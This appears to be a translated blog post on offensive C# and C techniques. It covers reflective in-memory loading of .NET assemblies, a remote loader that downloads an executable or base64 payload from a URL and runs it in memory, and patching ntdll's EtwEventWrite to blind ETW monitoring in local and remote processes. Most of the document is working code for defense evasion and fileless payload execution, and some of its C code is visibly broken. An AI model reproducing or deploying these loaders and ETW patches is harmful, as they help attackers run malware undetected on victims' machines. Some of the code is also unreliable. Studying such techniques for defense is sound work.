c#
loader
One way is to find the method in the specified space class through reflection and then invoke it
Another way is to load through EntryPoint.Invoke
Reflection loading
Assembly.Load() loads the assembly from a String or AssemblyName type, which can read the assembly in string form
Assembly.LoadFrom() loads the assembly from the specified file and also loads other assemblies referenced and dependent on the target assembly.
Assembly.LoadFile() also loads the assembly from the specified file but does not load other assemblies referenced and dependent on the target assembly.
a.cs
using System;
using System.Diagnostics;
namespace DemoExe
{
class Program
{
static void Main(string[] args)
{
Console.WriteLine("DemoExe Run!!");
}
}
public class Test
{
public static void TestMethod()
{
Process p = new Process();
p.StartInfo.FileName = "C:\\windows\\system32\\calc.exe";
p.Start();
}
}
}
csc /out:test.exe .\a.cs
create.cs
using System;
namespace Tobase64
{
class Program
{
static void Main(string[] args)
{
byte[] base64Buff = File.ReadAllBytes("E:\\tmp\\c#test\\test.exe");
string base64string = Convert.ToBase64String(base64Buff);
Console.WriteLine(base64string);
}
}
}
loader.cs
using System;
using System.Reflection;
namespace LoadExe
{
class Program
{
static void Main(string[] args)
{
string base64string = @"";
byte[] Buffer = Convert.FromBase64String(base64string);
Assembly assembly = Assembly.Load(Buffer);
Type type = assembly.GetType("DemoExe.Test");
MethodInfo method = type.GetMethod("TestMethod");
Object obj = assembly.CreateInstance(method.Name);
method.Invoke(obj, null);
}
}
}
Remote pull
using System;
using System.Net;
using System.Reflection;
namespace demo1
{
class Program
{
static void Main(string[] args)
{
string fileDownloadurl = null;
string filedownloadtype = null;
byte[] filebuffer = null;
try
{
fileDownloadurl = args[1];
filedownloadtype = args[0];
}
catch
{
Console.WriteLine("\nLoad the remote exe file into memory for execution: sflcsharp.exe -b the URL of the exe file");
Console.WriteLine("\nLoad the remote base64 encrypted file into memory for execution: sflcsharp.exe -b64 the URL of the base64 file");
Environment.Exit(0);
}
if (filedownloadtype == "-b")
{
filebuffer = Downloadbinarypefilebyhttp(fileDownloadurl);
}
if (filedownloadtype == "-b64")
{
filebuffer = downloadbase64(fileDownloadurl);
}
if (filebuffer != null)
{
Console.WriteLine("Loading the downloaded program into the memory of the current user");
Assembly assemblyinstance = Assembly.Load(filebuffer); //Load the downloaded program into the memory of the current user
Console.WriteLine("Finding the program entry point and executing the program");
assemblyinstance.EntryPoint.Invoke(null, new object[] { null }); //Find the entry point of the program and execute it
Console.WriteLine("\nProgram execution completed");
}
}
public static byte[] Downloadbinarypefilebyhttp(string url)
{
Console.WriteLine("\nCreate WebClient class to download PE file");
WebClient downloadwebclient = new WebClient(); //This class can download or upload data from a specified URL
Console.WriteLine("\nAfter downloading the file, it is automatically saved in byte[] format\n");
byte[] test = downloadwebclient.DownloadData(url);
return test;
}
public static byte[] downloadbase64(string url)
{
Console.WriteLine("\nCreate WebClient class to download base64 encrypted file, the downloaded data is stored in memory in string format");
WebClient downloadwebclient = new WebClient(); //This class can download or upload data from a specified URL
string b64 = downloadwebclient.DownloadString(url);
Console.WriteLine("Convert the base64 string to byte[] type of data");
byte[] test = Convert.FromBase64String(b64);
return test;
}
}
}
ExecuteAssembly
Introduction
The function loads and executes the .NET assembly in the memory of the target machine without writing the assembly to the disk, thus avoiding leaving suspicious files on the disk and bypassing some defense mechanisms based on file scanning.
Process
1 Load CLR environment 2 Get program domain 3 Load assembly 4 Execute assembly
bypass etw
Some information called by the assembly is recorded, and bypass etw is required
Patch EtwEventWrite Function
Patch EtwEventWriteOrEtwEventWriteFull
db analysis is omitted, modify ntdll EtwEventWrite directly ret(c3), and then re-acquire Etw will return timeout
C language implementation
#include <Windows.h>
#include <stdio.h>
#include <Tlhelp32.h>
void bypassetw()
{
STARTUPINFOA si = { 0 };
PROCESS_INFORMATION pi = { 0 };
si.cb = sizeof(si);
CreateProcessA(NULL, (LPSTR)"powershell -NoExit", NULL, NULL, NULL, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
unsigned char EtwEventWrite[] = { 'E','t','w','E','v','e','n','t','W','r','i','t','e', 0 };
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
LPVOID pEtwEventWrite = GetProcAddress(hNtdll, (LPCSTR)EtwEventWrite);
DWORD oldProtect, ool = 0;
char patch = 0xc3;
VirtualProtectEx(pi.hProcess, (LPVOID)pEtwEventWrite, 1, PAGE_EXECUTE_READWRITE, &oldProtect);
WriteProcessMemory(pi.hProcess, (LPVOID)pEtwEventWrite, &patch, sizeof(char), NULL);
VirtualProtectEx(pi.hProcess, (LPVOID)pEtwEventWrite, 1, oldProtect, &ool);
ResumeThread(pi.hThread);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
FreeLibrary(hNtdll);
}
int main() {
bypassetw();
return 0;
}
Remote process bypass, slightly modify the remote process injection written before
#include <windows.h>
#include <stdio.h>
#include <TlHelp32.h>
typedef FARPROC
(WINAPI
* pGetProcAddress)(
_In_ HMODULE hModule,
_In_ LPCSTR lpProcName
typedef HMODULE
(WINAPI
* pLoadLibraryA)(
_In_ LPCSTR lpLibFileName
BOOL mydllinject(DWORD pid);
DWORD fun(LPCTSTR ProcessName);
int main()
{
DWORD pid = 0;
DWORD pid = fun(L"cc.exe");
printf("pid:睵n", pid);
mydllinject(pid);
system("pause");
return 0;
}
BOOL mydllinject(DWORD pid)
{
HMODULE hMod = GetModuleHandle(L"kernel32.dll");
pGetProcAddress pThreadProc = (pGetProcAddress)GetProcAddress(hMod, "LoadLibraryW");
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
if (hProcess == NULL)
{
return FALSE;
}
char patch = 0xc3;
unsigned char EtwEventWrite[] = { 'E','t','w','E','v','e','n','t','W','r','i','t','e', 0 };
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
LPVOID pEtwEventWrite = GetProcAddress(hNtdll, (LPCSTR)EtwEventWrite);
DWORD oldProtect, ool = 0;
printf("%x\n", pEtwEventWrite);
VirtualProtectEx(hProcess, (LPVOID)pEtwEventWrite, 1, PAGE_EXECUTE_READWRITE, &oldProtect);
WriteProcessMemory(hProcess, (LPVOID)pEtwEventWrite, &patch, sizeof(char), NULL);
VirtualProtectEx(hProcess, (LPVOID)pEtwEventWrite, 1, oldProtect, &ool);
}
DWORD fun(LPCTSTR ProcessName)
{
HANDLE hProceessnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProceessnap == INVALID_HANDLE_VALUE)
{
printf_s("Failed to create process snapshot\n");
return 0;
}
else
{
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(pe32);
BOOL hProcess = Process32First(hProceessnap, &pe32);
while (hProcess)
{
if (_wcsicmp(ProcessName, pe32.szExeFile) == 0)
{
return pe32.th32ProcessID;
}
hProcess = Process32Next(hProceessnap, &pe32);
}
}
CloseHandle(hProcessnap);
return 0;
}
Effect demonstration, successfully blinds the monitoring of Etw on cc.exe
你可能想看:
Knowledge Point 5: Bypass CDN through Space Engine & Use Tools for Global CDN Bypass Scanning
A brief analysis of 403 bypass issues
ebpf usage on development boards and bypassing root detection
How to use Acheron to modify Go programs and try to bypass antivirus product detection.
3. Implementation defects and bypassing integrity protection
最后修改时间:
Bypass Applocker
上一篇
2025年03月27日 18:43
Bytecode analysis of higher version JDK
下一篇
2025年03月27日 19:06
评论已关闭